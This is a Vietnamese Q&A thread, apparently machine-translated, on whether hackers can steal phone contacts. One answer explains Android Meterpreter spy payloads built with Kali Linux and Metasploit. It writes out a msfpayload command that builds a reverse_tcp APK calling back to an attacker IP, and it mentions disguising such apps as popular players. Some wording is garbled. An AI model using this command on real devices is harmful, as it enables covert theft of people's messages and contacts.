Bất cứ ai có thể hack số liên lạc của chúng tôi?

Sep 16 2021

Trả lời

AyushSahay13 Sep 02 2017 at 22:55

Có, Không chỉ số liên lạc Tin tặc có thể Hack sms của bạn, nhật ký cuộc gọi, tác vụ đang chạy trên điện thoại, chụp ảnh, v.v. Tin tặc sử dụng để Tạo một loại vi-rút Payload Spy Sứ có thể lấy dữ liệu điện thoại của bạn. Tin tặc sử dụng tải trọng phiên của métpreter cho Android để tạo ra loại virus này. Nói chung, tin tặc đang sử dụng Kali Linux để tạo tải trọng này. Kali Linux là một bản phân phối Linux có nguồn gốc từ Debian được thiết kế để kiểm tra khả năng xâm nhập và pháp y kỹ thuật số. Nó được duy trì và tài trợ bởi Offensive Security Ltd. Mati Aharoni, Devon Kearns và Raphaël Hertzog là những nhà phát triển cốt lõi.

Kali Linux có hơn 600 chương trình kiểm tra thâm nhập được cài đặt sẵn, bao gồm Armitage (một công cụ quản lý tấn công mạng bằng đồ họa), Nmap (một máy quét cổng), Wireshark (một bộ phân tích gói), John the Ripper password cracker, Aircrack-ng (một phần mềm bộ để kiểm tra thâm nhập mạng LAN không dây), bộ Burp và máy quét bảo mật ứng dụng web OWASP ZAP.

Kali Linux có thể chạy nguyên bản khi được cài đặt trên đĩa cứng của máy tính, có thể được khởi động từ đĩa CD trực tiếp hoặc USB trực tiếp hoặc nó có thể chạy trong một máy ảo. Nó là một nền tảng được hỗ trợ của Khung Metasploit của Dự án Metasploit, một công cụ để phát triển và thực hiện các khai thác bảo mật.

Tin tặc đang sử dụng cmd này để tạo tải trọng.

Metasploit đã được cập nhật gần đây (hoặc, ít nhất, kể từ lần cuối cùng tôi sử dụng nó), và một điều lớn, là msfpayload đã bị loại bỏ và được thay thế bằng msfvenom. Tôi đã từng chỉ có thể tải msfpayload android / meterpreter / reverse_tcp LHOST = ip R> /root/name.apk

Hacker này không chỉ sử dụng để tạo ứng dụng bình thường mà còn để do thám chẳng hạn - MX PLAYER, v.v. loại ứng dụng này.

Bạn đã bao giờ kiểm tra trong OS marshmallow rằng nó đang yêu cầu quyền cho phép truy cập liên hệ, sms, v.v. Nếu bạn cho phép ứng dụng tin tặc hơn tin tặc có thể truy cập dữ liệu cá nhân của bạn.

Cảm ơn vì đã đọc.

Ashwin223 Aug 23 2017 at 17:46

Có, có thể hack bất kỳ địa chỉ liên hệ nào .. hoặc là các cuộc tấn công sevral cho việc này bằng cách sử dụng TEDMUX hoặc Kaali Linux, bất kỳ ai cũng có thể hack địa chỉ liên hệ của bạn